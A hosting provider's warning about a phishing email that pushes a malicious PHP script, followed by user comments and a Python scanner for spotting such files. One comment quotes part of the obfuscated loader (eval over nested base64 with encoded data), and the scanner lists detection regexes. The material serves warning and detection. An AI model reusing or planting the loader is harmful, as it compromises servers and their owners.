Fraudulent Email

It has come to our attention that a handful of hosting customers recently received a fraudulent email message claiming to be from CWS. The subject line of this message is “Hosting Regular Security Maintenance.”

The message includes an attached PHP script named webguard.php with instructions for the hosting customer to place the script on his or her website and run it. Although this file is presented as a security feature, the opposite is in fact true. The script is malicious and is intended to compromise the security of a server on which it runs.

Should you receive an email of this nature, do not under any circumstances upload the script to your website. If you ever receive an email that claims to be from CWS and have any question at all about its authenticity, please contact us at 1-888-426-7793.

2 responses

  1. This is what I received from a client asking if it was true.

    I opened it in textpad and it looks really fishy…

    Here is a portion of the file (now deleted)

    < ? p h p // This file is protected by copyright law and provided under license. Reverse engineering of this file is strictly prohibited.
    $OOO0O0O00=__FILE__;$O00O00O00=__LINE__;$OO00O0000=129812;urldecode(eval((base64_decode(base64_decode(‘SkU4d01EQlBNRTh3TUQxbWIzQmxiaWdrVDA5UE1FOHdUekF3TENkeVlpY3BPM2RvYVd4bEtDMHRKRTh3TUU4d01FOHdNQ2xtWjJWMGN5Z2tUekF3TUU4d1R6QXdMREV3TWpRcE8yWm5aWFJ6S0NSUE1EQXdUekJQTURBc05EQTVOaWs3SkU5UE1EQlBNREJQTUQwb1ltRnpaVFkwWDJSbFkyOWtaU2h6ZEhKMGNpaG1jbVZoWkNna1R6QXdNRTh3VHpBd0xETTNNaWtzSnpFeU16UTFOamM0T1RCQllVSmlRMk5FWkVWbFJtWkhaMGhvU1dsS2FrdHJUR3hOYlU1dVQyOVFjRkZ4VW5KVGMxUjBWWFZXZGxkM1dIaFplVnA2S3k4OUp5d25RVUpEUkVWR1IwaEpTa3RNVFU1UFVGRlNVMVJWVmxkWVdWcGhZbU5rWldabmFHbHFhMnh0Ym05d2NYSnpkSFYyZDNoNWVqQXhNak0wTlRZM09Ea3JMeWNwS1NrN1pYWmhiQ2drVDA4d01FOHdNRTh3S1RzPQ==’)))));return;?>
    05zcB42cB42cB4vnJOfogw0nJ7tlHWFP0vzkdNnBdfzk0UTM0U9S05zceu2cB5ZTB3XM0U9RA70lJWFWb6zNhGbsh7FPJwdUj89Pho0nHGDP05ZTB42cB5ZTB3TNeVZTB5ZTB41TAEToBe9ub4FWbuLxB56lDO04HVdNdGf7hNjoE7l0IFpQEWrBi5vreOxciv2TFg6EJnbuf8dfjfhWfwjHK6nxGoPqauVoa3

  2. Had a look at a similar email claiming to be from snapnames.com. It is very obfuscated but turns out to be a tool for getting lots of server info and doing various bad things from PHP. It notified a Gmail account when run, too.
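
A defender-side check for the traits visible in the file portion quoted in the first response, written as an added example (not code from CWS or from either commenter). The rule names, thresholds and both sample strings are assumptions constructed here, and the placeholder payload decodes to nothing.

```python
import re
from pathlib import Path

# Heuristics derived from the quoted portion of webguard.php (assumed rule set).
RULES = {
    # eval() fed by base64_decode(), allowing extra parentheses or wrapper calls
    "eval-of-base64": re.compile(
        r"eval\s*\((?:[\s(]|\w+\s*\()*base64_decode\s*\(", re.I),
    # base64_decode() applied directly to another base64_decode()
    "nested-base64": re.compile(r"base64_decode\s*\(\s*base64_decode\s*\(", re.I),
    # variable names built only from the letter O and the digit 0
    "o0-variable": re.compile(r"\$O[O0]{5,}\b"),
    # script stores its own path, typically to read itself back later
    "self-reference": re.compile(r"\$\w+\s*=\s*__FILE__"),
    # long unbroken data following the closing PHP tag
    "data-after-close-tag": re.compile(r"\?>\s*\S{64,}"),
}

def scan_php(text):
    """Return the sorted names of all rules that match the given PHP source."""
    return sorted(name for name, rx in RULES.items() if rx.search(text))

def is_suspicious(hits):
    """eval-of-base64 alone is enough; otherwise require two weaker traits."""
    return "eval-of-base64" in hits or len(hits) >= 2

def scan_tree(root):
    """Scan every *.php file under root; map path -> rule hits for suspects."""
    findings = {}
    for path in Path(root).rglob("*.php"):
        hits = scan_php(path.read_text(errors="replace"))
        if is_suspicious(hits):
            findings[str(path)] = hits
    return findings

# Constructed sample with the same shape as the quoted file; payload is inert.
SUSPECT = ("<?php // constructed sample\n"
           "$OOO0O0O00=__FILE__;"
           "eval((base64_decode(base64_decode('PLACEHOLDER'))));return;?>\n"
           + "A" * 80)

# Constructed benign sample: ordinary use of base64_decode on stored data.
BENIGN = "<?php $logo = base64_decode($row['logo_b64']); echo strlen($logo); ?>"

if __name__ == "__main__":
    for label, src in (("suspect", SUSPECT), ("benign", BENIGN)):
        hits = scan_php(src)
        print(label, is_suspicious(hits), hits)
```

Run `scan_tree()` against a copy of the web root or a quarantine directory of mail attachments; a hit is a prompt for manual review, not proof of compromise.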
